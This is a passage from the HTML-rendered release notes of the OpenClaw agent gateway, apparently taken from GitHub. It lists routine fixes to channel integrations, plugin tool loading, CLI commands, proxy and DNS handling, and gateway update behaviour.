<p>Tlon: expose <code>groupInviteAllowlist</code> in the channel config schema and clarify that group invite auto-accept fails closed without an invite allowlist. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Control UI/WebChat: collapse duplicate in-flight internal text sends onto the active Gateway run so rapid repeat submits do not start fresh <code>agent:main:main</code> dispatches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365412486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75737" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75737/hovercard" href="https://github.com/openclaw/openclaw/issues/75737">#75737</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dsdsddd1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dsdsddd1">@dsdsddd1</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</p>
</li>
<li>
<p>Mattermost: accept the documented <code>channels.mattermost.streaming</code> config and honor <code>streaming: "off"</code> by disabling draft preview posts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Mattermost: expose streaming progress config labels and help text in generated channel config metadata so Control UI/docs can explain the new <code>channels.mattermost.streaming.progress.*</code> fields. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Mattermost: honor <code>channels.mattermost.streaming.progress.toolProgress=false</code> in progress draft mode so compact tool status lines stay hidden until final delivery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Microsoft Teams: honor progress draft tool lines in native Teams progress streams and suppress standalone tool messages when <code>channels.msteams.streaming.progress.toolProgress=false</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord: keep progress draft boundary callbacks bound during streaming replies, so extension lint stays green while progress previews transition between assistant and reasoning blocks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord: resolve SecretRef-backed bot tokens from the active runtime snapshot for named accounts and keep unresolved configured tokens from crashing status or health checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373196456" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76987" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76987/hovercard" href="https://github.com/openclaw/openclaw/pull/76987">#76987</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</p>
</li>
<li>
<p>Channels/streaming: expose <code>streaming.progress.label</code>, <code>labels</code>, <code>maxLines</code>, and <code>toolProgress</code> in bundled channel config metadata so progress draft settings appear in config, docs, and control surfaces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Channels/streaming: normalize whitespace and case for <code>streaming.progress.label: "auto"</code> so progress draft labels keep using the built-in label pool instead of rendering a literal <code>auto</code> title. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/Codex: preserve Codex-native OAuth routing for <code>/codex bind</code> app-server turns so bound sessions keep the selected Codex auth profile instead of falling back to public OpenAI credentials. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371977999" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76714" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76714/hovercard" href="https://github.com/openclaw/openclaw/pull/76714">#76714</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/keshavbotagent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/keshavbotagent">@keshavbotagent</a>.</p>
</li>
<li>
<p>Gateway/install: prefer supported system Node over nvm/fnm/volta/asdf/mise when regenerating managed gateway services, so <code>gateway install --force</code> no longer recreates service definitions that doctor immediately flags as version-manager-backed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370479446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76339/hovercard" href="https://github.com/openclaw/openclaw/issues/76339">#76339</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brokemac79/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brokemac79">@brokemac79</a>.</p>
</li>
<li>
<p>Cron/status: render explicit <code>delivery.mode: "none"</code> jobs as no-delivery previews and label cron session history distinctly instead of showing fallback delivery or direct-session rows. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373002812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76945" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76945/hovercard" href="https://github.com/openclaw/openclaw/issues/76945">#76945</a>.</p>
</li>
<li>
<p>Gateway/usage: serve <code>usage.cost</code> and <code>sessions.usage</code> from a durable transcript aggregate cache with lock-safe background refreshes and localized stale-cache status, so large usage views avoid repeated full scans. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371689139" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76650" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76650/hovercard" href="https://github.com/openclaw/openclaw/pull/76650">#76650</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvinthebored/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvinthebored">@Marvinthebored</a>.</p>
</li>
<li>
<p>Plugins/hooks: let <code>plugins.entries.&lt;id&gt;.hooks.timeoutMs</code> and <code>plugins.entries.&lt;id&gt;.hooks.timeouts</code> bound plugin typed hooks from operator config, so slow hooks can be tuned without patching installed plugin code. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372195245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76778" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76778/hovercard" href="https://github.com/openclaw/openclaw/issues/76778">#76778</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Telegram: add <code>channels.telegram.mediaGroupFlushMs</code> at the top level and per account so operators can tune album buffering instead of being stuck with the hard-coded 500ms media-group flush window. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369407591" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76149" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76149/hovercard" href="https://github.com/openclaw/openclaw/issues/76149">#76149</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Config/messages: coerce boolean <code>messages.visibleReplies</code> and <code>messages.groupChat.visibleReplies</code> values to the documented enum modes so an intuitive toggle no longer invalidates config and drops channel startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362618830" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75390" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75390/hovercard" href="https://github.com/openclaw/openclaw/issues/75390">#75390</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scottgl9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scottgl9">@scottgl9</a>.</p>
</li>
<li>
<p>Agents/network: allow trusted web-search providers and configured model-provider hosts to work behind Surge/Clash/sing-box fake-IP DNS by accepting RFC 2544 and IPv6 ULA synthetic answers only for the request's scoped hostname, without broad private-network access. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371165031" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76530" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76530/hovercard" href="https://github.com/openclaw/openclaw/pull/76530">#76530</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371221003" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76549" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76549/hovercard" href="https://github.com/openclaw/openclaw/pull/76549">#76549</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</p>
</li>
<li>
<p>Providers: honor env-proxy settings for guarded provider model fetches when no explicit dispatcher policy is configured, preserving explicit transport overrides. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4313226664" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70453" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70453/hovercard" href="https://github.com/openclaw/openclaw/issues/70453">#70453</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332554258" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72480" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72480/hovercard" href="https://github.com/openclaw/openclaw/pull/72480">#72480</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mjamiv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mjamiv">@mjamiv</a>.</p>
</li>
<li>
<p>Web fetch: add a default-off <code>tools.web.fetch.useTrustedEnvProxy</code> opt-in for proxy-only environments so <code>web_fetch</code> can let an operator-controlled HTTP(S) proxy resolve DNS while preserving default strict DNS pinning and hostname policy checks. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4174983773" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58034" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58034/hovercard" href="https://github.com/openclaw/openclaw/pull/58034">#58034</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4218664195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62560" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62560/hovercard" href="https://github.com/openclaw/openclaw/issues/62560">#62560</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cosmicnet/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cosmicnet">@cosmicnet</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mjamiv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mjamiv">@mjamiv</a>.</p>
</li>
<li>
<p>Feishu: accept and honor <code>channels.feishu.blockStreaming</code> at the top level and per account, while keeping the legacy default off so Feishu cards no longer reject documented config or silently drop block replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363708099" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75555" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75555/hovercard" href="https://github.com/openclaw/openclaw/issues/75555">#75555</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/update: avoid <code>launchctl kickstart -k</code> immediately after fresh macOS update bootstraps, and unlink dangling global plugin-runtime symlinks during packaged postinstall and <code>doctor --fix</code> so upgrades no longer SIGTERM the newly booted Gateway or leave bundled plugin imports pointed at pruned <code>plugin-runtime-deps</code> trees. Completes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370027099" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76261" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76261/hovercard" href="https://github.com/openclaw/openclaw/issues/76261">#76261</a> and fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370948926" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76466" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76466/hovercard" href="https://github.com/openclaw/openclaw/issues/76466">#76466</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372917596" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76929" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76929/hovercard" href="https://github.com/openclaw/openclaw/pull/76929">#76929</a>)</p>
</li>
<li>
<p>Google Chat: normalize custom Google auth transport headers before google-auth/gaxios interceptors run, restoring webhook token verification when certificate retrieval expects Fetch <code>Headers</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372087228" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76742" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76742/hovercard" href="https://github.com/openclaw/openclaw/issues/76742">#76742</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donbowman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donbowman">@donbowman</a>.</p>
</li>
<li>
<p>Doctor/plugins: reset stale <code>plugins.slots.memory</code> and <code>plugins.slots.contextEngine</code> references during <code>doctor --fix</code>, so cleanup of missing plugin config does not leave unrecoverable slot owners behind. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371224583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76550" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76550/hovercard" href="https://github.com/openclaw/openclaw/issues/76550">#76550</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371225742" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76551" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76551/hovercard" href="https://github.com/openclaw/openclaw/issues/76551">#76551</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Docs/WhatsApp: merge the duplicate top-level <code>web</code> objects in the gateway channel config example so copy-pasted WhatsApp config keeps both <code>web.whatsapp</code> and reconnect settings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371502896" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76619" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76619/hovercard" href="https://github.com/openclaw/openclaw/issues/76619">#76619</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WadydX/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WadydX">@WadydX</a>.</p>
</li>
<li>
<p>Plugins/Anthropic: expose Claude thinking profiles from the bundled provider-policy artifact so non-runtime callers keep Opus 4.7 <code>adaptive</code>, <code>xhigh</code>, and <code>max</code> instead of downgrading to <code>high</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372204983" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76779" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76779/hovercard" href="https://github.com/openclaw/openclaw/issues/76779">#76779</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tomascupr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tomascupr">@tomascupr</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iAbhi001/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iAbhi001">@iAbhi001</a>.</p>
</li>
<li>
<p>Plugins/tools: honor <code>tools.alsoAllow</code> as an optional plugin tool discovery hint without treating its internal allow-all default as permission to load every manifest-marked optional plugin tool. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371480161" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76616" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76616/hovercard" href="https://github.com/openclaw/openclaw/issues/76616">#76616</a>.</p>
</li>
<li>
<p>Discord/native commands: skip slash-command registration and cleanup REST calls when <code>channels.discord.commands.native=false</code>, letting low-power gateways start without waiting on disabled native-command lifecycle requests. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369686252" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76202" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76202/hovercard" href="https://github.com/openclaw/openclaw/issues/76202">#76202</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>CLI/plugins: reject unowned command roots such as <code>openclaw foo</code> before managed proxy startup and full plugin CLI runtime loading while preserving manifest-owned and CLI-metadata-owned plugin commands. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361630008" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75287" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75287/hovercard" href="https://github.com/openclaw/openclaw/issues/75287">#75287</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neilofneils404/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neilofneils404">@neilofneils404</a>.</p>
</li>
<li>
<p>CLI/message: skip local configured-channel plugin preload for explicit gateway-owned message actions, letting normalized CLI delivery delegate to the gateway without initializing channel runtime in the short-lived CLI process. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363198122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75477" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75477/hovercard" href="https://github.com/openclaw/openclaw/issues/75477">#75477</a>.</p>
</li>
<li>
<p>Plugins/commands: normalize empty plugin command handler results and let Telegram native plugin commands send the empty-response fallback instead of throwing when a handler returns <code>undefined</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355136227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74800" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74800/hovercard" href="https://github.com/openclaw/openclaw/issues/74800">#74800</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/tools: cold-load selected plugin tool registries when the active registry only has partial tool coverage, so wildcard-expanded allowlists no longer hide installed plugin tools from <code>tools.effective</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372207787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76780" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76780/hovercard" href="https://github.com/openclaw/openclaw/issues/76780">#76780</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lilesjtu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lilesjtu">@lilesjtu</a>.</p>
</li>
<li>
<p>Plugins/tools: compare cached and runtime plugin tool name conflicts with normalized core tool names, so case variants of core tools are blocked instead of leaking duplicate tool registrations. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/OpenRouter: advertise DeepSeek V4 thinking levels, including <code>xhigh</code> and <code>max</code>, through the runtime and lightweight provider policy surfaces so <code>/think</code> validation no longer rejects OpenRouter-routed DeepSeek V4 models. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355101928" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74788" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74788/hovercard" href="https://github.com/openclaw/openclaw/issues/74788">#74788</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Status/sessions: ignore malformed non-string persisted session provider/model metadata instead of throwing while rendering status summaries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369700535" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76206" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76206/hovercard" href="https://github.com/openclaw/openclaw/issues/76206">#76206</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>CLI/config: remove only the targeted array element for <code>openclaw config unset array[index]</code> instead of replaying the unset during config write and deleting the shifted next element. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370277739" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76290" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76290/hovercard" href="https://github.com/openclaw/openclaw/issues/76290">#76290</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/voice-call: treat abnormal local Gateway close code 1006 as a standalone CLI fallback case, so <code>voicecall smoke</code> and related commands can still run the provider check path when the Gateway socket closes before returning a response.</p>
</li>
<li>
<p>CLI/doctor: migrate legacy per-channel <code>streaming.progress</code> config into <code>streaming.preview.toolProgress</code>, so upgrades with stale Discord or Telegram streaming keys validate again instead of blocking plugin commands.</p>
</li>
<li>
<p>Plugins/release: reject ClawHub code-plugin packages that contain TypeScript runtime entries without compiled <code>dist/*.js</code> output, and run package-local runtime-build checks during npm and ClawHub plugin release previews.</p>
</li>
<li>
<p>Plugins/update: keep beta-installed OpenClaw package updates on the beta plugin channel even when config still says stable, so Discord and other externalized plugins update from compiled <code>@beta</code> packages instead of stale source-only <code>latest</code> artifacts.</p>
</li>
<li>
<p>Agents/tools: stop treating <code>tools.deny: ["write"]</code> as an implicit <code>apply_patch</code> deny; operators who want to block patch writes should deny <code>apply_patch</code> or <code>group:fs</code> explicitly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372125703" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76749" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76749/hovercard" href="https://github.com/openclaw/openclaw/issues/76749">#76749</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372261939" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76795" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76795/hovercard" href="https://github.com/openclaw/openclaw/pull/76795">#76795</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nek-12/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nek-12">@Nek-12</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Plugins/release: verify published plugin npm tarballs expose compiled runtime entries after publish, catching TS-only package artifacts before release closeout. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>CLI/message: exit cleanly with a nonzero status when message-command plugin registry loading fails before dispatch, preventing <code>openclaw-message</code> children from staying alive after plugin load errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369518725" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76168" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76168/hovercard" href="https://github.com/openclaw/openclaw/issues/76168">#76168</a>.</p>
</li>
<li>
<p>Plugins/config: report configured plugins that are present but blocked by path-safety checks as blocked instead of stale <code>plugin not found</code> entries, and deduplicate repeated blocked-candidate warnings during discovery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369376180" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76144" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76144/hovercard" href="https://github.com/openclaw/openclaw/issues/76144">#76144</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mayank6136/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mayank6136">@mayank6136</a>.</p>
</li>
<li>
<p>Gateway/update: recover an installed-but-unloaded macOS LaunchAgent after package updates, rerun Gateway health/version/channel readiness checks, and print restart, reinstall, and rollback guidance before reporting update failure. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372245183" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76790" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76790/hovercard" href="https://github.com/openclaw/openclaw/pull/76790">#76790</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonathanlindsay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonathanlindsay">@jonathanlindsay</a>.</p>
</li>
<li>
<p>CLI/plugins: explain when a missing plugin command alias belongs to a bundled plugin that is disabled by default, including the <code>openclaw plugins enable &lt;plugin&gt;</code> repair command. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372434646" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76835" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76835/hovercard" href="https://github.com/openclaw/openclaw/pull/76835">#76835</a>)</p>
</li>
<li>
<p>Gateway/Bonjour: auto-start LAN multicast discovery only on macOS hosts while preserving explicit <code>openclaw plugins enable bonjour</code> startup elsewhere, so Linux servers and containers that do not need LAN discovery avoid default mDNS probing and watchdog churn. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348958904" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74209" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74209/hovercard" href="https://github.com/openclaw/openclaw/issues/74209">#74209</a>.</p>
</li>
<li>
